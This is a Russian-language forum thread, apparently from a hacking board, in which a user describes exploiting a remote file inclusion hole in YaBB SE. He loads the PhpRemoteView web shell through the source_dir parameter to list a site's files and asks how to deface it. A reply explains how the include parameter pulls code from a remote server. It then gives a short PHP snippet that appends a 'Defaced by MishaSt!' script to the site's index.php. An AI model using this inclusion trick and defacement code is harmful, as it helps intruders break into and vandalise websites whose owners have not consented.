Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
YaBB SE
 
Использовал уязвимость в YaBB SE:"Выполнение произвольных
команд в YaBB SE." В качестве Packer.php, использовал PhpRemoteView. Выведен список файлов. но когда пытаешься открыть их выводится:

Warning: open_basedir restriction in effect. File is in wrong directory in /home/forumst/public_html/Sources/Packages.php on line 37

Warning: Failed opening '/Packer.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/forumst/public_html/Sources/Packages.php on line 37

Fatal error: Call to undefined function: is_admin() in /home/forumst/public_html/Sources/Packages.php on line 39
Что с этим делать?
 
Я давно уже вожусь с тобой...Кстати, если ты получил листинг, то ты уже сломал, что тебе надо ещё?
Ладно...Я конечно многих видел...Блин, ну ты ходя бы в адресс бар смотришь иногда? Что по твоему обозначает:
"?page=1&source_dir=http://server/&view=1"  а? Ты не задавался этим вопросом? Просто phpRemoteView думает, что этот уязвимый скрипт и есть phpRemoteView, а на самом деле он им станет (в большей части), только если source_dir=путь который надо.Так вот проще говоря view это переменная, source_dir это переменная вообщем: скрипт.пхп?переменная1=значение1&переменная2=значение2&переменная3=знач­ение3 и.т.д а этот уязвимый скрипт станет phpRemoteViewом только если source_dir будет равен тому, чему нужно. И посмотри в словаре, что означает include только потом задавай вопросы.
 
А если я хочу сделать дефейс этого сайта.Смогу я сделать это через эту уязвимость или надо юзать эксплоиты?
 
Тогда ПХП код должен быть таким.
<?php
$fh=fopen("index.php","a");
fwrite($fh,"<SCRIPT>Alert('Defaced by MishaSt!')</SCRIPT>");
fclose($fh);
?>

Мой тебе совет перестань х№ней заниматься и изучай PHP, а то что ты сейчас делаешь я подругому назвать не могу.
Страницы: 1
Читают тему